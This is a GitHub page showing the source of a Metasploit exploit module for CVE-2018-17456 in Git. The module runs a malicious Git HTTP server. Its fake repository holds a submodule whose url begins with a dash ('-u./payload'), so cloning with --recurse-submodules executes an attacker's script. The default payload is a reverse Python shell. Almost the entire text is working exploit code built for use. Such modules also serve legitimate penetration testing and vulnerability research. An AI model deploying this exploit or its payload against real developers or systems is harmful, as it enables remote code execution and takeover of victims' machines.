-
Notifications
You must be signed in to change notification settings - Fork 13.8k
/
git_submodule_url_exec.rb
158 lines (141 loc) · 5.02 KB
/
git_submodule_url_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Git
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Malicious Git HTTP Server For CVE-2018-17456',
'Description' => %q(
This module exploits CVE-2018-17456, which affects Git
versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.
When a submodule url which starts with a dash e.g "-u./payload" is passed
as an argument to git clone, the file "payload" inside the repository
is executed.
This module creates a fake git repository which contains a submodule
containing the vulnerability. The vulnerability is triggered when the
submodules are initialised (e.g git clone --recurse-submodules URL)
),
'Author' => 'timwr',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2018-17456'],
['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ],
['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ],
['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],
],
'DisclosureDate' => '2018-10-05',
'Targets' => [
['Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' => {'Compat' => {'PayloadType' => 'python'}}
}
]
],
'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'},
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
}
)
)
register_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
]
)
end
def setup
@repo_data = {
git: { files: {} }
}
setup_git
super
end
def setup_git
# URI must start with a /
unless git_uri && git_uri.start_with?('/')
fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
end
payload_content = "#!/bin/sh\n#{payload.raw} &"
payload_file = Rex::Text.rand_text_alpha(4..6)
submodule_path = datastore['GIT_SUBMODULE']
if submodule_path.blank?
submodule_path = Rex::Text.rand_text_alpha(2..6).downcase + ":" + Rex::Text.rand_text_alpha(2..6).downcase
end
unless submodule_path.include?":"
fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')
end
gitmodules = "[submodule \"#{submodule_path}\"]
path = #{submodule_path}
url = -u./#{payload_file}
"
blob_obj = GitObject.build_blob_object(gitmodules)
@repo_data[:git][:files]["/objects/#{blob_obj.path}"] = blob_obj.compressed
payload_blob = GitObject.build_blob_object(payload_content)
@repo_data[:git][:files]["/objects/#{payload_blob.path}"] = payload_blob.compressed
tree_entries =
[
{
mode: '100644',
file_name: '.gitmodules',
sha1: blob_obj.sha1
},
{
mode: '100744',
file_name: payload_file,
sha1: payload_blob.sha1
},
{
mode: '160000',
file_name: submodule_path,
sha1: blob_obj.sha1
}
]
tree_obj = GitObject.build_tree_object(tree_entries)
@repo_data[:git][:files]["/objects/#{tree_obj.path}"] = tree_obj.compressed
commit_obj = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)
@repo_data[:git][:files]["/objects/#{commit_obj.path}"] = commit_obj.compressed
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@repo_data[:git][:files]['/info/refs'] = "#{commit_obj.sha1}\trefs/heads/master\n"
end
def primer
# add the git and mercurial URIs as necessary
hardcoded_uripath(git_uri)
git_url = URI.parse(get_uri).merge(git_uri)
print_status("Malicious Git URI is #{git_url}")
print_status("git clone --recurse-submodules #{git_url}")
end
# handles git clone
def on_request_uri(cli, req)
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
if @repo_data[:git][:files].key?(req_file)
vprint_status("Sending Git #{req_file}")
send_response(cli, @repo_data[:git][:files][req_file])
else
vprint_status("Git #{req_file} doesn't exist")
send_not_found(cli)
end
end
# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
def git_uri
return @git_uri if @git_uri
if datastore['GIT_URI'].blank?
@git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git'
else
@git_uri = datastore['GIT_URI']
end
end
end